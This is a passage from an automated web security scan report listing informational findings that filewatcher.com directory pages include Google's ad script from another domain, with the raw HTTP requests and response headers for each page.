Expires: Mon, 31 Jan 2011 16:00:36 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 509
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.eenet.ee/pub/cpan/ - FTP Bro
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.818. http://www.filewatcher.com/b/ftp/ftp.eenet.ee/pub/cpan/scripts.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.eenet.ee/pub/cpan/scripts.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.eenet.ee/pub/cpan/scripts.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:36 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "oxDN9p9OBQ4hXPB8TpRjPA"
Content-Length: 16158
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:36 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 515
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.eenet.ee/pub/cpan/scripts/ -
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.819. http://www.filewatcher.com/b/ftp/ftp.eenet.ee/pub/cpan/scripts/news.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.eenet.ee/pub/cpan/scripts/news.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.eenet.ee/pub/cpan/scripts/news.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:37 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "CBmQ9foRq8/qL7wXBvIiIA"
Content-Length: 13154
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:37 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 520
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.eenet.ee/pub/cpan/scripts/ne
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.820. http://www.filewatcher.com/b/ftp/ftp.eenet.ee/pub/cpan/scripts/news/nntpstuff.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.eenet.ee/pub/cpan/scripts/news/nntpstuff.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.eenet.ee/pub/cpan/scripts/news/nntpstuff.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:37 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "d9Zu5BVbJv5iSpE0A+wyGw"
Content-Length: 7291
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:37 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 522
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.eenet.ee/pub/cpan/scripts/ne
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.821. http://www.filewatcher.com/b/ftp/ftp.eenet.ee/pub/cpan/scripts/news/nntpstuff/aub.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.eenet.ee/pub/cpan/scripts/news/nntpstuff/aub.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.eenet.ee/pub/cpan/scripts/news/nntpstuff/aub.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:37 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "lMQqfxxsJQ9nhb76JE1lDQ"
Content-Length: 6931
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:37 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 523
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.eenet.ee/pub/cpan/scripts/ne
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.822. http://www.filewatcher.com/b/ftp/ftp.fagskolen.gjovik.no.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.fagskolen.gjovik.no.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.fagskolen.gjovik.no.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:39 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "xt0jzmIUDwisfVckCKmWGQ"
Content-Length: 5901
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:39 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 526
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.fagskolen.gjovik.no/ - FTP B
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.823. http://www.filewatcher.com/b/ftp/ftp.fagskolen.gjovik.no/pub.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.fagskolen.gjovik.no/pub.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.fagskolen.gjovik.no/pub.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:39 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "m8s+A2M90ezOyf75rBXvAQ"
Content-Length: 12465
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:39 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 528
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.fagskolen.gjovik.no/pub/ - F
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.824. http://www.filewatcher.com/b/ftp/ftp.fagskolen.gjovik.no/pub/FreeBSD.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.fagskolen.gjovik.no/pub/FreeBSD.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.fagskolen.gjovik.no/pub/FreeBSD.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:43 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "ZOE7dBK+AtltZfKuq3Cb4w"
Content-Length: 6716
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:43 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 537
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.fagskolen.gjovik.no/pub/Free
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.825. http://www.filewatcher.com/b/ftp/ftp.fagskolen.gjovik.no/pub/FreeBSD/releases.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.fagskolen.gjovik.no/pub/FreeBSD/releases.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.fagskolen.gjovik.no/pub/FreeBSD/releases.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:43 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "9wBXdw4DW5zwmhbcL0N2Gg"
Content-Length: 5978
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:43 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 537
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.fagskolen.gjovik.no/pub/Free
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.826. http://www.filewatcher.com/b/ftp/ftp.fagskolen.gjovik.no/pub/FreeBSD/releases/amd64.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.fagskolen.gjovik.no/pub/FreeBSD/releases/amd64.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.fagskolen.gjovik.no/pub/FreeBSD/releases/amd64.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:43 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "nrjtWnMZvHq33j6fjsHksg"
Content-Length: 7336
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:43 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 539
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.fagskolen.gjovik.no/pub/Free
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.827. http://www.filewatcher.com/b/ftp/ftp.fagskolen.gjovik.no/pub/FreeBSD/releases/amd64/6.3-RELEASE.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.fagskolen.gjovik.no/pub/FreeBSD/releases/amd64/6.3-RELEASE.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.fagskolen.gjovik.no/pub/FreeBSD/releases/amd64/6.3-RELEASE.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:45 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "sfPhSIkadVgAQ3shlF5V1w"
Content-Length: 14118
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:45 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 542
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.fagskolen.gjovik.no/pub/Free
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.828. http://www.filewatcher.com/b/ftp/ftp.fagskolen.gjovik.no/pub/FreeBSD/releases/amd64/6.3-RELEASE/packages.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.fagskolen.gjovik.no/pub/FreeBSD/releases/amd64/6.3-RELEASE/packages.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.fagskolen.gjovik.no/pub/FreeBSD/releases/amd64/6.3-RELEASE/packages.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:46 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "VUTr0W2gxfknmBFQfpdsEw"
Content-Length: 5907
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:46 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 542
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.fagskolen.gjovik.no/pub/Free
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.829. http://www.filewatcher.com/b/ftp/ftp.fagskolen.gjovik.no/pub/FreeBSD/releases/amd64/6.3-RELEASE/packages/All.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.fagskolen.gjovik.no/pub/FreeBSD/releases/amd64/6.3-RELEASE/packages/All.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.fagskolen.gjovik.no/pub/FreeBSD/releases/amd64/6.3-RELEASE/packages/All.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:46 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "Tkqmj4k8hBsHGhDx+fmzAw"
Content-Length: 50606
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:46 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 543
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.fagskolen.gjovik.no/pub/Free
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.830. http://www.filewatcher.com/b/ftp/ftp.fagskolen.gjovik.no/pub/FreeBSD/releases/amd64/7.0-RELEASE.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.fagskolen.gjovik.no/pub/FreeBSD/releases/amd64/7.0-RELEASE.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.fagskolen.gjovik.no/pub/FreeBSD/releases/amd64/7.0-RELEASE.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:44 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "t2wKH7QTZRUvJbmiL8suFg"
Content-Length: 13614
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:44 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 540
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.fagskolen.gjovik.no/pub/Free
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.831. http://www.filewatcher.com/b/ftp/ftp.fagskolen.gjovik.no/pub/FreeBSD/releases/amd64/7.0-RELEASE/packages.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.fagskolen.gjovik.no/pub/FreeBSD/releases/amd64/7.0-RELEASE/packages.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.fagskolen.gjovik.no/pub/FreeBSD/releases/amd64/7.0-RELEASE/packages.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:44 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "HQ9uxfb1S7ZzJqnBmNe8Pw"
Content-Length: 6158
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:44 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 540
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.fagskolen.gjovik.no/pub/Free
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.832. http://www.filewatcher.com/b/ftp/ftp.fagskolen.gjovik.no/pub/FreeBSD/releases/amd64/7.0-RELEASE/packages/All.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.fagskolen.gjovik.no/pub/FreeBSD/releases/amd64/7.0-RELEASE/packages/All.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.fagskolen.gjovik.no/pub/FreeBSD/releases/amd64/7.0-RELEASE/packages/All.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:44 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "UBEARS6yEQnl2m+51/CAPQ"
Content-Length: 51878
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:44 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 541
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.fagskolen.gjovik.no/pub/Free
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.833. http://www.filewatcher.com/b/ftp/ftp.fagskolen.gjovik.no/pub/OpenBSD.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.fagskolen.gjovik.no/pub/OpenBSD.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.fagskolen.gjovik.no/pub/OpenBSD.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:40 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "dbTzEc/iNSMHVkeRYuff5Q"
Content-Length: 7084
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:40 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 527
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.fagskolen.gjovik.no/pub/Open
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.834. http://www.filewatcher.com/b/ftp/ftp.fagskolen.gjovik.no/pub/OpenBSD/4.1.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/b/ftp/ftp.fagskolen.gjovik.no/pub/OpenBSD/4.1.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.fagskolen.gjovik.no/pub/OpenBSD/4.1.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
